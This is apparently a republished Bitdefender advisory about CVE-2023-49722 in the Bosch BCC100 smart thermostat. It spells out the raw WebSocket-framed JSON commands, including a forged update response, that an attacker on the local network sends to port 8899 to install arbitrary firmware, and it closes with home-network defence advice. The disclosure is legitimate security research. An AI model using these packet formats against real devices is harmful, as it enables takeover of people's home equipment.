Bosch BCC100 thermostat reveals vulnerabilities
Share
Several factors underscore the importance of smart thermostats: energy efficiency, environmental sustainability, and the spread of smart home technologies. These devices have a major impact on energy conservation and its associated cost savings, while also making homes noticeably more comfortable.
This combination of energy efficiency, convenience, and environmental consciousness, which resonate with the current priorities of individuals, governments, and societies, has led to the diversification of an ecosystem comprised of multiple vendors and technologies.
As the creator of the world’s first smart home cybersecurity hub, Bitdefender regularly audits popular IoT hardware for vulnerabilities that might affect customers if left unaddressed. This research report is part of a broader programme and aims to shed light on the security of the world’s best-sellers in the IoT space. This report covers the Bosch BCC100 thermostat and reveals vulnerabilities affecting the SW version 1.7.0 and HD version 4.13.22.
During our security audit, Bitdefender researchers discovered a vulnerability that lets an attacker on the same network replace the device firmware with a rogue version (CVE-2023-49722).
Vulnerability walkthrough
The thermostat has two microcontrollers that work together. One is a Hi-Flying chip, HF-LPT230, that implements the Wi-Fi functionality. It acts as a network gateway for the logic microcontroller. The other, the STMicroelectronics chip, STM32F103, is the brain of the device and implements the main logic.
The STM chip has no networking capabilities and instead relies on the Wi-Fi chip to communicate with the Internet. It uses the UART protocol to pass data to the Wi-Fi chip, which acts as a gateway or proxy and establishes the actual connection to the servers.
We have discovered that the Wi-Fi chip also listens on TCP port 8899 on the LAN and will mirror any message received on that port directly to the main microcontroller through the UART data bus. This means that, if formatted correctly, the microcontroller can’t distinguish malicious messages from genuine ones sent by the cloud server. This allows an attacker to send commands to the thermostat, including writing a malicious update to the device.
Updating the thermostat with arbitrary firmware
The thermostat communicates with the connect.boschconnectedcontrol.com server through JSON-encoded payloads over a Web socket. The packets sent by the server are unmasked, making them easy to imitate.
First, we send the “device/update” command on port 8899 that lets the device know that there is a new update and to start the update procedure:
\x81\x46 {“cmd”:”device/update”,”device_id”:”<device mac address>”,”timestamp”:1111111}
This will prompt the thermostat to ask the cloud server for details about the update.
{“cmd”:”server/fireware”,”device_id”:”<device mac address>”,”timestamp”:”<unix timestamp>”,”model”:”BCC101″,”version”:”1.7.0″,”id”:”0″}
Even though the server responds with an error code because there is no update available:
{“error_code”:”99″,”cmd”:”server/fireware”,”device_id”:”<device mac address>”,”timestamp”:”<unix timestamp>”}
The device will also accept a forged response containing the update details:
\x81\x7e\x01\x33 {“error_code”:”0″,”cmd”:”server/fireware”,”device_id”:”<device mac>”,”timestamp”:”<unix timestamp>”,”model”:”BCC101″,”version”:”<fw version>”,”url”:”<firmware URL>”,”size”:”<firmware size>”, “isize”:”0″,”pic_pos”:”2930″,”md5″:”<firmware md5>”,”type”:0, “release_date”:”1111-11-11″}
This packet contains the URL where the firmware will be downloaded from, the size and MD5 checksum of the firmware file, and the version of the new firmware, which must be higher than the current one. There are no validation mechanisms for firmware update authenticity.
If all the conditions match, the thermostat asks the cloud server to download the firmware and send it through the WebSocket:
{“cmd”:”server/deviceUpdate”,”device_id”:”<device mac>”,”timestamp”:”<unix timestamp>”,”url”:”<firmware URL>”,”pindex”:”0″}
The URL must be Internet-accessible, as the cloud server is the component that downloads the file. After the device receives the file, it performs the upgrade. At this point, the device is considered totally compromised.
Best practices for IoT devices
Home users should closely monitor IoT devices and isolate them as completely as possible from the local network. This can be done by setting up a dedicated network exclusively for IoT devices.
Additionally, IoT users can use the free Bitdefender Smart Home Scanner app to scan for connected devices and identify and highlight vulnerable ones. IoT device owners should also check for newer firmware and update devices as soon as the vendor releases new versions.
To minimise risks of compromise, smart home users should consider adopting a network cybersecurity solution integrated into the router, such as the NETGEAR Orbi or Nighthawk routers powered by Bitdefender Armour.
Justin Lavadia is a content producer and editor at Public Spectrum with a diverse writing background spanning various niches and formats. With a wealth of experience, he brings clarity and concise communication to digital content. His expertise lies in crafting engaging content and delivering impactful narratives that resonate with readers.
Today’s Pick
11th Annual Aus Goverment Data Summit
April 1, 2025
7th Annual NZ Government Data Summit
May 7, 2025
3rd Public Sector Comms Week
May 14, 2025
Subscribe
We send emails,
but we do not spam
Join our mailing list to be on the front lines of healthcare , get exclusive content, and promos.
AI appointment Australia Australian boost boosts business businesses covid-19 cyber attack cybersecurity cyber security data data breach data management defence Digital employment enhance enhances fraud funding governance government grants Healthcare infrastructure Innovation Lockdown management new zealand NSW NZ online public Public Sector queensland renewable energy scams security Social Media Technology telecommunications victoria WA
Last Viewed